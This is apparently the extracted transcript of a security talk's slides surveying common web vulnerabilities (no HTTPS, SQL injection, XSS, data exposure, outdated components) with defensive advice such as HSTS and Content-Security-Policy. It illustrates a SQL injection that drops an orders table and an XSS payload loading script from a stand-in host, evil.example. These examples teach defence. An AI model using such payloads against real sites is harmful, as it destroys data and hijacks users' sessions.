There Is No Silver Bullet

there is no silver bullet Henri Watson

Which vulnerabili.es commonly aﬀect web applica.ons in the
Dominican Republic?

No HTTPS

Using HTTPS won’t cost you an arm and a
leg.

The current proposal for HTTP/2.0 requires TLS.

If you decide to use HTTPS, also use Strict-‐Transport-‐Security
and ssllabs.com/ssltest

SQL Injec.ons

GET /tracker?order=12345”; DROP TABLE orders;-‐-‐ SELECT * FROM
orders WHERE order = “12345”; DROP TABLE orders;-‐-‐” AND status = “pending” Request from the client to the server Request from the webserver to the database

Authen.ca.on Implementa.on Mistakes

Cross-‐Site Scrip.ng (XSS)

GET /hi?name=<script src=“hep://evil.example/ l33thax.js”></script> Hello, <script src=“hep://evil.example/ l33thax.js”></script>!
Request from the client to the server Reply from the server to the client

Content-‐Security-‐Policy

Exposure of Sensi.ve Data

Using Components With Known Vulnerabili.es

Mailing Lists •  bugtraq hep://www.securityfocus.com/archive/1 •  debian-‐security-‐announce
heps://lists.debian.org/debian-‐security-‐announce/ •  fulldisclosure hep://nmap.org/mailman/lis.nfo/fulldisclosure

Mailing Lists •  [email protected] heps://hepd.apache.org/lists.html#hep-‐announce •  nginx-‐announce
hep://mailman.nginx.org/mailman/lis.nfo/nginx-‐ announce •  php-‐announce hep://php.net/mailing-‐lists.php

Customer Service

Why is there no “silver bullet”?

Informa.on security is a constant investment.

Heartbleed

By placing your users’ informa.on at risk, you also
risk ruining your company’s reputa.on.

Thanks! @henriwatson [email protected] heps://henriwatson.com/talks/silverbullet

There Is No Silver Bullet

There Is No Silver Bullet

Harley Watson

More Decks by Harley Watson

Other Decks in Programming

Featured

Transcript